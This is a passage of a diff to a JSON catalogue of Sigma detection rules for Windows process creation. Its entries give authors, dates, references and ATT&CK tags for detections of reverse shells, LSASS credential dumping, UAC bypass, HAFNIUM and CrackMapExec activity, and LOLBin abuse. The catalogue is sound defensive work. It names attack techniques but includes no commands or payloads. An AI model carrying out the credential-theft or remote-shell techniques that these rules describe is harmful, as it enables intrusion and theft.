Bencherchali", - "creation_date": "2020/05/02", + "creation_date": "2022/03/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", - "value": "PowerShell Get-Clipboard Cmdlet Via CLI" - }, - { - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powershell_public_folder.yml", + "filename": "proc_creation_win_crackmapexec_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" - ], - "tags": "No established tags" - }, - "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "value": "Execution of Powershell Script in Public Folder" - }, - { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", - "meta": { - "author": "FPT.EagleEye, wagga", - "creation_date": "2021/03/03", - "falsepositive": [ - "Administrative might use this function for checking network connectivity" - ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": 
"edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "value": "Powershell Reverse Shell Connection" - }, - { - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", - "meta": { - "author": "FPT.EagleEye", - "creation_date": "2021/03/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "25676e10-2121-446e-80a4-71ff8506af47", - "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM" - }, - { - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "meta": { - "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "36210e0d-5b19-485d-a087-c096088885f0", - "value": "Suspicious PowerShell Parameter Substring" - }, - { - "description": "Detects suspicious powershell process 
which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "meta": { - "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", - "creation_date": "2018/09/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_xor_commandline.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" - ] - }, - "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", - "value": "Suspicious XOR Encoded PowerShell Command Line" - }, - { - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "meta": { - "author": "Markus Neis, @Karneades", - "creation_date": "2018/03/06", - "falsepositive": [ - "False positives are possible, depends on organisation and processes" - ], - "filename": "proc_creation_win_powersploit_empire_schtasks.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", - "value": "Default PowerSploit and Empire Schtasks Persistence" - }, - { - 
"description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/29", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powertool_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", - "value": "PowerTool Execution" - }, - { - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ] - }, - "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "value": "Privilege Escalation via Named Pipe Impersonation" - }, - { - "description": "Detects usage of the SysInternals Procdump utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Legitimate use of procdump by a developer or administrator" - ], - "filename": "proc_creation_win_procdump.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "value": "Procdump Usage" - }, - { - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Cases in which procdump just gets copied to a different directory without any renaming" - ], - "filename": "proc_creation_win_procdump_evasion.yml", - "level": "high", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1480785527901204481", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", - "value": "Procdump Evasion" - }, - { - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "meta": { - "author": "Cedric MAURUGEON", - "creation_date": "2021/09/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" ], "tags": [ "attack.credential_access", "attack.t1003.001" ] }, - "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "value": "Process Dump via RdrLeakDiag.exe" + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns" + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "meta": { + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Depend on scripts and administrative tools used 
in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "filename": "proc_creation_win_susp_copy_system32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32" + }, + { + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" + ], + "tags": [ + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" + ] + }, + "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "value": "Writing Of Malicious Files To The Fonts Folder" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target 
environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_logmein.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_winzip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" + }, + { + "description": "Marks a file as a system file using the attrib.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_attrib_system.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", + "value": "Set Windows System File with Attrib" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement" + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution" + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin" + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": 
"eee00933-a761-4cd0-be70-c42fe91731e7", + "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_powershell_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell" + }, + { + "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_node_abuse.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://nodejs.org/api/cli.html", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse" + }, + { + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/09", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_ps_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData" + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "value": "UAC Bypass Using ChangePK and SLUI" + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882" + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to 
make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation" + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS" + }, + { + "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharp_ldap_monitor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/p0dalirius/LDAPmonitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "value": "SharpLDAPmonitor Execution" + }, + { + "description": "Detects use of executionpolicy option to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/11/01", + "falsepositive": [ + "Administrator script" + ], + "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "value": "Change PowerShell Policies to an Insecure Level" + }, + { + "description": "This rule detects the execution of Run Once task as configured in the registry", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "creation_date": "2020/10/18", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runonce_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "value": "Run Once Task Execution as Configured in Registry" + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding" + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_electron_app_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mttaggart/quasar", + "https://taggart-tech.com/quasar-electron/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes" + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tor_browser.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use" }, { "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", 
@@ -44936,4222 +42239,284 @@
 "value": "Process Dump via Rundll32 and Comsvcs.dll"
 },
 {
